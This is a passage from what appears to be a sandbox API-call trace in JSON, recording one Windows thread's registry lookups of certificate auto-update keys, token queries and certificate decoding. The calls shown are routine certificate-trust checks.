x00\\x00\\x00\\xb0\\xef[\\x05t\\xa1ku\\xff\\xff\\xff\\xff\\x08\\x00\\x00\\x00\\xdc\\xef[\\x05" + } + ], + "repeated": 0, + "id": 2954 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ad70b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 2955 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000006b8" + }, + { + "name": "DesiredAccess", + "value": "0x02000000", + "pretty_value": "MAXIMUM_ALLOWED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x000002ac" + }, + { + "name": "ObjectAttributesName", + "value": "S-1-5-21-508823978-2055017376-4061076391-1001" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER" + } + ], + "repeated": 0, + "id": 2956 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000006d0" + }, + { + "name": "DesiredAccess", + "value": "0x00020119", + "pretty_value": "KEY_QUERY_VALUE|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|KEY_WOW64_64KEY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x000006b8" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\Software\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate" + } + ], + "repeated": 0, + "id": 2957 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000006d0" + }, + { + "name": "ValueName", + "value": "LastSyncTime" + }, + { + "name": "FullName", + "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate\\LastSyncTime" + } + ], + "repeated": 0, + "id": 2958 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ad70b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 2959 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000006d0" + }, + { + "name": "DesiredAccess", + "value": "0x00020119", + "pretty_value": "KEY_QUERY_VALUE|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|KEY_WOW64_64KEY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate" + } + ], + "repeated": 0, + "id": 2960 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000006d0" + }, + { + "name": "ValueName", + "value": "LastSyncTime" + }, + { + "name": "Type", + "value": "3", + "pretty_value": "REG_BINARY" + }, + { + "name": "Information", + "value": "\\xae\\xcb\\xeaM\\xa1\\x8f\\xdb\\x01" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate\\LastSyncTime" + } + ], + "repeated": 0, + "id": 2961 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x767e81e7", + "parentcaller": "0x767e8153", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 2962 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756b7eb6", + "parentcaller": "0x767e8775", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "29" + }, + { + "name": "TokenInformation", + "value": "\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 2963 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756ba174", + "parentcaller": "0x768087e5", + "category": "process", + "api": "NtOpenProcessToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "DesiredAccess", + "value": "0x00000008" + }, + { + "name": "TokenHandle", + "value": "0x000006d0" + } + ], + "repeated": 0, + "id": 2964 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756b7eb6", + "parentcaller": "0x76808ab9", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "1" + }, + { + "name": "TokenInformation", + "value": "\\x80\\xee[\\x05\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xaa\tT\\x1e\\xa0\\x13}z\\xa7\\x1b\\x0f\\xf2\\xe9\\x03\\x00\\x00\\x93>\\xd6\\xfat\\xa1ku\\x88\\x8f's\\xe5\\x87\\x80v*\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\x00\\x00\\\\x05\\x00\\x00\\x00\\x00\\x9c\\xee[\\x05\\xa8\\xef[\\x05\\xa4\\xfd[\\x05\\x90c\\x1bst\\xa1ku\\x88\\x8f's\\x18\\xef[\\x05\\xdb\\x9e\\x06slS%s$\\xb6,s\\xbcA\\x83\\x02\\x88\\x8f'sh\\xef[\\x05K?\\xd6\\xfaL\\xea[\\x05\\x04\\xa0\\x04s\\xa4\\xfd[\\x05\\x90c\\x1bs\\xdf!\\xab\\x8c\\xfe\\xff\\xff\\xffd\\xef[\\x05\\xe6\\xb5\\x07s9\\x00\\x00\\x00\\xbc\\x9a%s\\xdc\\xb5%s\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xd7\\xb5%s\\x9c\\xb3%s\\xff\\xff\\xff\\xff0~%s\\x08\\x00\\x00\\x00\\xc8\\xb5%s\\xa4\\xef[\\x05\\x00\\xf2\\xc4\\xefd\\xefT\\xef\\xc8\\xef\\x00\\x00<\\xff\\x00\\x00\\x00\\xf2[\\x05\\xc4\\xef[\\x05\\xc8\\xef[\\x05\\x00\\x00\\x00\\x00x\\xef[\\x05t\\xa1ku\\xff\\xff\\xff\\xff\\x08\\x00\\x00\\x00\\xa4\\xef[\\x05" + } + ], + "repeated": 0, + "id": 2965 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ad70b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 2966 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000006d0" + }, + { + "name": "DesiredAccess", + "value": "0x02000000", + "pretty_value": "MAXIMUM_ALLOWED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x000002ac" + }, + { + "name": "ObjectAttributesName", + "value": "S-1-5-21-508823978-2055017376-4061076391-1001" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER" + } + ], + "repeated": 0, + "id": 2967 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000006b8" + }, + { + "name": "DesiredAccess", + "value": "0x00020119", + "pretty_value": "KEY_QUERY_VALUE|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|KEY_WOW64_64KEY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x000006d0" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\Software\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate" + } + ], + "repeated": 0, + "id": 2968 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000006b8" + }, + { + "name": "ValueName", + "value": "LastSyncTime" + }, + { + "name": "FullName", + "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate\\LastSyncTime" + } + ], + "repeated": 0, + "id": 2969 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ad70b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 2970 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000006b8" + }, + { + "name": "DesiredAccess", + "value": "0x00020119", + "pretty_value": "KEY_QUERY_VALUE|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|KEY_WOW64_64KEY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate" + } + ], + "repeated": 0, + "id": 2971 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffff80000005", + "pretty_return": "BUFFER_OVERFLOW", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000006b8" + }, + { + "name": "ValueName", + "value": "EncodedCtl" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate\\EncodedCtl" + } + ], + "repeated": 1, + "id": 2972 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fc63b", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000006b8" + }, + { + "name": "ValueName", + "value": "EncodedCtl" + }, + { + "name": "Type", + "value": "3", + "pretty_value": "REG_BINARY" + }, + { + "name": "Information", + "value": "0\\x83\\x02\\xdf\\xe5\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x07\\x02\\xa0\\x83\\x02\\xdf\\xd50\\x83\\x02\\xdf\\xd0\\x02\\x01\\x011\\x0f0\r\\x06\t`\\x86H\\x01e\\x03\\x04\\x02\\x01\\x05\\x000\\x83\\x02\\xd0/\\x06\t+\\x06\\x01\\x04\\x01\\x827\n\\x01\\xa0\\x83\\x02\\xd0\\x1f0\\x83\\x02\\xd0\\x1a0\\x0c\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x03\t\\x02\t\\x14\\x01\\xdbq\\x1e\\x130p\\xaf\\x17\r250128004632Z0\t\\x06\\x05+\\x0e\\x03\\x02\\x1a\\x05\\x000\\x83\\x02\\xbe\\xa70\\x82\\x01D\\x04\\x14\\xcd\\xd4\\xee\\xae`\\x00\\xac\\x7f@\\xc3\\x80,\\x17\\x1e0\\x14\\x800\\xc0r1\\x82\\x01*0\\x18\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x0bh1\n\\x04\\x08\\x00\\x80\\xc8+h\\x86\\xd7\\x010\\x18\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x0b~1\n\\x04\\x08\\x00\\x00\\xd9\\xb5D\\xc1\\xd2\\x010\\x1e\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x0bi1\\x10\\x04\\x0e0\\x0c\\x06\n+\\x06\\x01\\x04\\x01\\x827<\\x03\\x020 \\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x0b\\x1d1\\x12\\x04\\x10\\xf0\\xc4\\x02\\xf0@N\\xa9\\xad\\xbf%\\xa0=\\xdf,\\xa6\\xfa0$\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x0b\\x141\\x16\\x04\\x14\\x0e\\xac\\x82`@V'\\x97\\xe5%\\x13\\xfc*\\xe1\nS\\x95Y\\xe4\\xa400\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x0bb1\"\\x04 \\x88]\\xe6L4\\x0e>\\xa7\\x06X\\xf0\\x1e\\x11E\\xf9W\\xfc\\xda'\\xaa\\xbe\\xea\\x1a\\xb9\\xfa\\xa9\\xfd\\xb0\\x10-@w0Z\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x0b\\x0b1L\\x04JM\\x00i\\x00c\\x00r\\x00o\\x00s\\x00o\\x00f\\x00t\\x00 \\x00R\\x00o\\x00o\\x00t\\x00 \\x00C\\x00e\\x00r\\x00t\\x00i\\x00f\\x00i\\x00c\\x00a\\x00t\\x00e\\x00 \\x00A\\x00u\\x00t\\x00h\\x00o\\x00r\\x00i\\x00t\\x00y\\x00\\x00\\x000\\x82\\x01,\\x04\\x14\\x18\\xf7\\xc1\\xfc\\xc3\t\\x02\\x03\\xfd[\\xaa/\\x86\\x1auIv\\xc8\\xdd%1\\x82\\x01\\x120\\x18\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x0bh1\n\\x04\\x08\\x00\\x006\\x04M\\xdf\\xd3\\x01" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate\\EncodedCtl" + } + ], + "repeated": 0, + "id": 2973 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x767f770e", + "parentcaller": "0x76800725", + "category": "crypto", + "api": "CryptDecodeObjectEx", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "CertEncodingType", + "value": "0x00000001" + }, + { + "name": "Encoded", + "value": "0\\x800\\x0c\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x03\t\\x02\t\\x14\\x01\\xdbq\\x1e\\x130p\\xaf\\x17\r250128004632Z0\t\\x06\\x05+\\x0e\\x03\\x02\\x1a\\x05\\x00\\x00\\x00" + }, + { + "name": "Flags", + "value": "0x00008004" + } + ], + "repeated": 0, + "id": 2974 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x767f770e", + "parentcaller": "0x768008d2", + "category": "crypto", + "api": "CryptDecodeObjectEx", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "CertEncodingType", + "value": "0x00000001" + }, + { + "name": "Encoded", + "value": "0\\x82\\x1130\\x82\\x11/\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x034\\x04\\x82\\x11\\x1f0\\x82\\x11\\x1b0\t\\x02\\x01\\x01\\x02\\x01\\x02\\x02\\x01\\x010Y0\\x13\\x06\\x07*\\x86H\\xce=\\x02\\x01\\x06\\x08*\\x86H\\xce=\\x03\\x01\\x07\\x03B\\x00\\x04\\x1d\\xb9l\\xa9\\xcbi\\x94\\xc5\\\\xe6\\xb6\\xa6\\x03\\xbb\\xd2\\xb8\\xdcTC\\x17(\\x99\\x0c\\x06\\x01P\\x1d\\x9dd\\xc0YF+\\xdc\\xc8\\x03\\x1d\\x05\\xb4-\\xa8\t\\xf7\\x99A\\xed\\x04\\xfb\\xe5W\\xba&\\x04\\xf6\\x11R\\xce\\x14e;/v+\\xc00Y0\\x13\\x06\\x07*\\x86H\\xce=\\x02\\x01\\x06\\x08*\\x86H\\xce=\\x03\\x01\\x07\\x03B\\x00\\x04 \\x82\\xa1\\xf9gh\\xa8\\xe4\\xdb\\x94\\x98\\xe2\\xe1h\\x87\\xe4\tm 538<\\xaf\\x14\\xaa\\xd7\\x08\\x18\\xf0\\xfd\\x16\\x9b\\xd3\\xff|'\\x82\\xd4\\x87\\xb7N$F;\\xfb\\xae\\xbe\\xc8#R +\\xaaD\\x05\\xfeT\\xf9\\xd5\\xf1\\x1dE\\x9a0Y0\\x13\\x06\\x07*\\x86H\\xce=\\x02\\x01\\x06\\x08*\\x86H\\xce=\\x03\\x01\\x07\\x03B\\x00\\x04\\xaf\\xe4\\xf3\\x94,\\xdf\\xa6'" + }, + { + "name": "Flags", + "value": "0x00008004" + } + ], + "repeated": 0, + "id": 2975 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x767f1f05", + "parentcaller": "0x767f569f", + "category": "crypto", + "api": "CryptDecodeObjectEx", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "CertEncodingType", + "value": "0x00000001" + }, + { + "name": "Encoded", + "value": "0\\x82\\x06\\x140\\x82\\x03\\xfc\\xa0\\x03\\x02\\x01\\x02\\x02\\x133\\x00\\x00\\x00q9\\xee\\x0eJ\\x97o\nm\\x00\\x00\\x00\\x00\\x00q0\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x0b\\x05\\x000\\x81\\x811\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x130\\x11\\x06\\x03U\\x04\\x08\\x13\nWashington1\\x100\\x0e\\x06\\x03U\\x04\\x07\\x13\\x07Redmond1\\x1e0\\x1c\\x06\\x03U\\x04\n\\x13\\x15Microsoft Corporation1+0)\\x06\\x03U\\x04\\x03\\x13\"Microsoft Certificate List CA 20110\\x1e\\x17\r240912201741Z\\x17\r250911201741Z0\\x81\\x891\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x130\\x11\\x06\\x03U\\x04\\x08\\x13\nWashington1\\x100\\x0e\\x06\\x03" + }, + { + "name": "Flags", + "value": "0x00008005" + } + ], + "repeated": 1, + "id": 2976 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x7680cb46", + "parentcaller": "0x767f610c", + "category": "crypto", + "api": "CryptDecodeObjectEx", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "CertEncodingType", + "value": "0x00010001" + }, + { + "name": "Encoded", + "value": "0\\x0c\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x03\t" + }, + { + "name": "Flags", + "value": "0x00008005" + } + ], + "repeated": 0, + "id": 2977 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x7680cb46", + "parentcaller": "0x7680c981", + "category": "crypto", + "api": "CryptDecodeObjectEx", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "CertEncodingType", + "value": "0x00010001" + }, + { + "name": "Encoded", + "value": "0\\x00" + }, + { + "name": "Flags", + "value": "0x00008005" + } + ], + "repeated": 0, + "id": 2978 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x7680cb46", + "parentcaller": "0x7680ca1c", + "category": "crypto", + "api": "CryptDecodeObjectEx", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "CertEncodingType", + "value": "0x00010001" + }, + { + "name": "Encoded", + "value": "0\\x16\\x80\\x14A\\xf0!\\xc7\\xed\\xc4\\x87\\xfa\\x83u\\xff\n\\x0c\\xdc-\\xec\\xa8j\\xabY" + }, + { + "name": "Flags", + "value": "0x00008005" + } + ], + "repeated": 0, + "id": 2979 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x767f1f05", + "parentcaller": "0x767f569f", + "category": "crypto", + "api": "CryptDecodeObjectEx", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "CertEncodingType", + "value": "0x00000001" + }, + { + "name": "Encoded", + "value": "0\\x82\\x07\r0\\x82\\x04\\xf5\\xa0\\x03\\x02\\x01\\x02\\x02\na\\x11l\\x92\\x00\\x00\\x00\\x00\\x00\\x070\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x0b\\x05\\x000\\x81\\x881\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x130\\x11\\x06\\x03U\\x04\\x08\\x13\nWashington1\\x100\\x0e\\x06\\x03U\\x04\\x07\\x13\\x07Redmond1\\x1e0\\x1c\\x06\\x03U\\x04\n\\x13\\x15Microsoft Corporation1200\\x06\\x03U\\x04\\x03\\x13)Microsoft Root Certificate Authority 20100\\x1e\\x17\r110329185839Z\\x17\r260329190839Z0\\x81\\x811\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x130\\x11\\x06\\x03U\\x04\\x08\\x13\nWashington1\\x100\\x0e\\x06\\x03U\\x04" + }, + { + "name": "Flags", + "value": "0x00008005" + } + ], + "repeated": 1, + "id": 2980 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x7680cb46", + "parentcaller": "0x767f610c", + "category": "crypto", + "api": "CryptDecodeObjectEx", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "CertEncodingType", + "value": "0x00010001" + }, + { + "name": "Encoded", + "value": "0.\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x03\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x03\\x01\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x03\t\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x03\\x13" + }, + { + "name": "Flags", + "value": "0x00008005" + } + ], + "repeated": 0, + "id": 2981 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x7680cb46", + "parentcaller": "0x7680c981", + "category": "crypto", + "api": "CryptDecodeObjectEx", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "CertEncodingType", + "value": "0x00010001" + }, + { + "name": "Encoded", + "value": "0\\x03\\x01\\x01\\xff" + }, + { + "name": "Flags", + "value": "0x00008005" + } + ], + "repeated": 0, + "id": 2982 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x7680cb46", + "parentcaller": "0x7680cb0d", + "category": "crypto", + "api": "CryptDecodeObjectEx", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "CertEncodingType", + "value": "0x00010001" + }, + { + "name": "Encoded", + "value": "\\x03\\x02\\x01\\x86" + }, + { + "name": "Flags", + "value": "0x00008005" + } + ], + "repeated": 0, + "id": 2983 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x7680cb46", + "parentcaller": "0x7680ca1c", + "category": "crypto", + "api": "CryptDecodeObjectEx", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "CertEncodingType", + "value": "0x00010001" + }, + { + "name": "Encoded", + "value": "0\\x16\\x80\\x14\\xd5\\xf6V\\xcb\\x8f\\xe8\\xa2\\bh\\xd1=\\x94\\x90[\\xd7\\xce\\x9a\\x18\\xc4" + }, + { + "name": "Flags", + "value": "0x00008005" + } + ], + "repeated": 0, + "id": 2984 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x76801e39", + "parentcaller": "0x76801dfb", + "category": "crypto", + "api": "CryptDecodeObjectEx", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "CertEncodingType", + "value": "0x00000001" + }, + { + "name": "Encoded", + "value": "0\\x82\\x02\n\\x02\\x82\\x02\\x01\\x00\\xb8\\x84z\\x80\\xfdM'\\xa7\\xd2\\xef\\x826\\xf1S\\x05\\x9d\\xbeBm\\x8e1\\x08G\\xcb\\xcd\\xb3\\x83\nKN3\\x1a.|\\xddr\\x81\\x8d\\xce\\x90\\xfc<\\x05\\xcb/4\\x858\\x8f<\\x1chm`QRM\\xac\\xdam+~\\xb3sG\\xab\\xd2\\xdc\\x95qJ1\\x81Z\\xa1\\x1f\\xab\\x82&E-\\x8c\\xe8\\x84x\\xbd \\xf0\r\\xc6\\xf5\\xae&\\x87\\x1eV\\x8eU<\\x0802\\x94\\x94\"\\x93\\x0b\\xa5\\xb0\\xc6]\\xe6-\\x819\\xcd\\xe9\\xc7\\xae\\xe8\\xd8IqI\\xab\\x91t\\xb8O\\x8d/G\\xb3?\\xd0\\x93\\x83\\\\x02\\x1a\\xdeK\\xb8\\xb2<7\\xe9\\x93\\xear[\\x98\\xc7\\xe3\\xac\\x18\\xe0\\xe6~J\\xc1\\x81,\\xfd\"\\x14vs\\xe1h\\xdc \t\\xc0\\xf3F\\xcd#&\\xc8E\"\\xca\\xc7\\xbct\\xfc\\x89\\xffW\\xe0\\xcf\\xbd\\x8e\\xb0+\\xef&\\xd6w\\xab\\x1a\\xf4gA\\xf1^\\x0cq\\xaa\\x02\\x7f^\\xc0\\x82\\xaa\t\\x8b\\xec\\x89\\x88A\\xf5\\x03Bi\\xd9\\x1fE\\xd9W>\\x04\\x96J\\xd52\\xb7\\xd1a&h\\xc7\\xc1\\xb1\\xa0\\xe0" + }, + { + "name": "Flags", + "value": "0x00008000" + } + ], + "repeated": 0, + "id": 2985 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x76801d87", + "parentcaller": "0x76801cb7", + "category": "crypto", + "api": "CryptImportKey", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "KeyBlob", + "value": "\\x06\\x02\\x00\\x00\\x00\\xa4\\x00\\x00RSA1\\x00\\x10\\x00\\x00\\x01\\x00\\x01\\x00\\x9f6\\x88\\xe5\\x9b\\xea\\x04@\\xca\\xf6\\xc6\r;\\xcdA\\xca\\xf0\\xb5#\\x88\\x00:\\xb5F\\xfe\\xf5F\\x1d\\x9d\\xc3\\x01\\xc0\t\\xb4\\x8eU\\x8e\\xa0\\xe5\\xc4H\\xf5\\x7f\\xc2\\xba\\xc7\\x1dm0CD\\xd7\\xeeX\\x05\\xaa\\xac\\xe9\\x98\\x14\\x81\\xa7q\\xd3\\x93\\x8e\r\\xade1\\x8e\\xe5#\\x93\\xacU+(\t\\x17\\xddX\\x81\\x80Ho6\\x89\\xf2L\\x12\\xd0\\xdf\\xdau\\xdbv\\xc6\\xe4\\xc6\\xaf\\xe1\\x94/\\x01\\x81h\\xd7\\x9f\\x90\\xaf\r\\xdb\\xff\\x88w\\xe8\\xc3\\xfd\\xe4N\\xaa\\xcbd\\x15*V\\xc2T\\xa1\\x9c+\\xdc\\xf0_e\\xe1Wl\\xe3\\xe1\\x9bW\\xd0\\x98\\x7f\\xbd\\x14\\xc7\\xc1\\xfd\\x9f\\xd3\\xde}\\x12\\xbb\\x7f\\x9e\\xc0X\\x9dbG\\x87LA\\x87\\xc5\\xf1\\x88AQ\\x0f\\xac\\xfa\\x91\\xeb\\xa7\\x07\\xa0*\\xf23\\xec\\xddh\\x83 @\\xe0O\\xfc\\x96\\xb1\\xdd&\\x9c\\x95\\xb7\\x8a'~\\x86\\x04{\\xcdx\\xa7\\xde\\x90\\xf1\\xfa\\x18\\xff\\x9bG\\xbf\\xcb\\xddd \\x98e\\xd6]!g\\x83\\xc8k\\x93\\xb3l\\x98\\x02" + }, + { + "name": "Flags", + "value": "0x00000000" + }, + { + "name": "CryptKey", + "value": "0x05850f38" + }, + { + "name": "Length", + "value": "532" + } + ], + "repeated": 0, + "id": 2986 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x7680cb46", + "parentcaller": "0x7680c981", + "category": "crypto", + "api": "CryptDecodeObjectEx", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "CertEncodingType", + "value": 